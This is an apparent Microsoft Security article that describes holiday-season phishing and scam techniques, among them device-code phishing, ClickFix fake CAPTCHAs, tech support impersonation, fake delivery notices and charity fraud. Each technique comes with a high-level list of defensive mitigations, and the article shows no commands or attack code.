This is the Trace Id: a762ca39d310504d0d82d29726722e46

Staying secure online during the holidays

Share
A woman in a grey sweater sitting at a table looking at her phone.

What defenders need to know

Cybercriminals love a good opportunity to take advantage of people, and when it comes to the holiday season, it’s easier when they are distracted. Between shopping, family time, those nasty head colds spreading around, and connecting with loved ones over the internet, it’s easy pickings for threat actors.

Unfortunately, that spike in legitimate activity creates cover for threat actors. Microsoft’s Threat Intelligence data shows attackers time campaigns to coincide with periods when people are distracted, rushed, and more trusting of emails from retailers or delivery services.

These seasonal patterns show up consistently in Microsoft’s telemetry and in the 2025 Microsoft Digital Defense Report (MDDR), which highlights how AI-enabled social engineering and impersonation attacks increase in both volume and success rate during high-transaction periods.

Here’s what defenders and everyday users should keep an eye on as the holidays approach.

Device-code phishing

During the holiday rush when order confirmations, shipping updates, identity checks, and fraud alerts genuinely spike, threat actors exploit the noise. They send messages prompting users to enter a “verification code” to fix a purchase issue or confirm a delivery. The pretext feels familiar and time-sensitive, which lowers suspicion. But entering that code can silently grant attackers OAuth access to the user’s account without ever requiring a password.

Microsoft Threat Intelligence has tracked a steady rise in these credential-less account takeover techniques across both consumer and enterprise environments. Attackers use device codes and consent-based phishing because they’re simple, scalable, and highly effective at bypassing traditional credential theft controls. During peak shopping periods, these lures blend seamlessly with legitimate communications, making detection harder and increasing the likelihood of compromise.
How to mitigate device-code phishing
  • Restrict device code flow wherever possible
  • Strengthen sign-in clarity and user verification
  • Revoke access immediately when suspicious activity is detected
  • Use sign-in risk policies to automate containment
  • Monitor Risky Sign-Ins continuously

Fake CAPTCHA attacks (ClickFix schemes)

Holiday travel deals, flash sales, and last-minute gift hunting create ideal conditions for attackers to hide in plain sight. Redirect attacks that impersonate booking confirmations or promotional emails often lead victims to a CAPTCHA page, a pattern users trust and rarely question. But these aren’t real CAPTCHAs. Threat actors now use them as a delivery mechanism for social engineering instructions, prompting victims to paste malicious commands directly into Windows Run prompts or terminals.

Microsoft Threat Intelligence recently warned about the rapid growth of these ClickFix schemes. They require no exploit chain, just user action. This simplicity makes them highly scalable and particularly dangerous during seasonal peaks, when shoppers are moving quickly and are more likely to comply with seemingly routine prompts.

For example, just ahead of Thanksgiving, Microsoft Threat Intelligence detected and blocked a high-volume phishing campaign from Storm-0900 targeting tens of thousands of U.S. users. The actor timed its operation to land on a holiday when people were distracted and expecting urgent messages.

The emails used familiar lures like parking tickets, medical results, and Thanksgiving references. Each message redirected victims to an attacker-controlled site with a fake slider CAPTCHA, followed by a ClickFix prompt.

Microsoft disrupted the campaign through filtering, endpoint protection, and preemptive blocking of attacker infrastructure. However, the campaign is a clear example of how threat actors pair trusted UX patterns (like CAPTCHAs) with user-execution techniques to bypass traditional controls.
How to mitigate fake CAPTCHA and ClickFix attacks
  • Enforce application control and restrict command execution paths
  • Disable or tightly restrict unneeded command-line interfaces
  • Harden browser and URL filtering policies
  • Strengthen user heuristics around unexpected actions
  • Monitor for unusual command execution patterns
  • Maintain least-privilege account design

Tech support impersonation scams

People travel with less-secure personal devices, use hotel wifi, and encounter more technical hiccups. Attackers exploit this by impersonating support staff to solve non-existent problems. These scams consistently surge in November–January, especially for elderly family members or people who aren’t deeply technical.

The 2025 MDDR calls out support scams as one of the most successful global fraud categories. More specifically, extortion and ransomware drive half of all cyberattacks.

Threat actors increasingly use AI-generated scripts, realistic phone personas, and brand impersonation to add credibility. The result is a convincing pretext that can lead to remote-access malware installation, credential theft, or full account takeover.

For defenders and executives, these scams are especially concerning because they blur personal and corporate risk: a compromised personal device on hotel Wi-Fi can quickly become a staging point for broader attacks.
Mitigating tech support impersonation scams
  • Reduce the attack surface with strict remote-access controls
  • Reinforce verification culture across the organization
  • Train users to distrust urgency and assistance
  • Harden devices used during travel
  • Block look-alike domains and impersonation sites
  • Monitor for remote-access tool abuse and unusual helpdesk patterns
  • Provide clear, rapid reporting channels

Fake shipping and delivery notifications

Holiday shopping turns everyone into a package-tracking machine. Threat actors insert themselves into that mental workflow. With many people juggling a dozen shipments, one more email claiming a delay or address confirmation needed doesn’t raise suspicion.

According to the Digital Defense Report, shipping-themed phishing is one of the most abused impersonation categories. Microsoft Threat Intelligence sees predictable spikes in these logistics-based lures each holiday season, with attackers impersonating well-known carriers such as UPS, USPS, FedEx, Amazon, DHL, and regional postal services. The branding is convincing, the timing is plausible, and the user expectations during peak shopping weeks make these attacks especially effective.

Because these campaigns mirror legitimate transaction flows and often incorporate real tracking numbers pulled from data leaks or scraped inboxes, they are increasingly difficult for users to distinguish authentic notifications.
How to mitigate fake shipping and delivery notification scams
  • Enforce URL and domain protections that neutralize impersonation attempts
  • Harden user verification behaviors during peak shopping periods
  • Apply Conditional Access friction to financially sensitive actions
  • Add behavioral detection for mail rule creation and forwarding anomalies
  • Deploy impersonation protection and sender authentication policies

Charity and donation scams

Seasonal generosity spikes in Q4, especially during Giving Tuesday, and attackers exploit it. AI now enables threat actors to generate polished nonprofit websites, emotionally compelling stories, and persuasive donation forms at scale. They craft urgent, heart-tugging narratives about disaster relief, community drives, or last-chance holiday campaigns, hoping to combine goodwill with distraction and pressure.
Mitigating charity and donation scams
  • Reinforce verification culture — especially during giving seasons
  • Promote use of vetted donation platforms
  • Block and monitor look-alike or newly registered domains
  • Apply phishing-resistant identity controls and anomaly detection
  • Educate employees and stakeholders on scam shifts

Enjoy the season, but with eyes open

Security shouldn’t drain the joy from the season, but awareness matters more in moments of high activity and distraction. Microsoft’s guidance across the Be Cybersmart Kit align on this point: a pause, a verification step, or a second look is often the difference between staying safe and becoming a victim.

More like this

A book cover featuring blue and white colors with the text Microsoft Digital Defense Report 2025.

Digital Defense Report

Extortion and ransomware drive over half of cyberattacks
Read more

Feeding from the trust economy

Understanding the impact of social engineering fraud
Learn more
A white line drawing of a paper in an envelope with the word New on a blue background.

Get the CISO Digest

Stay ahead with expert insights, industry trends, and security research in this bimonthly email series.
Sign up

Follow Microsoft Security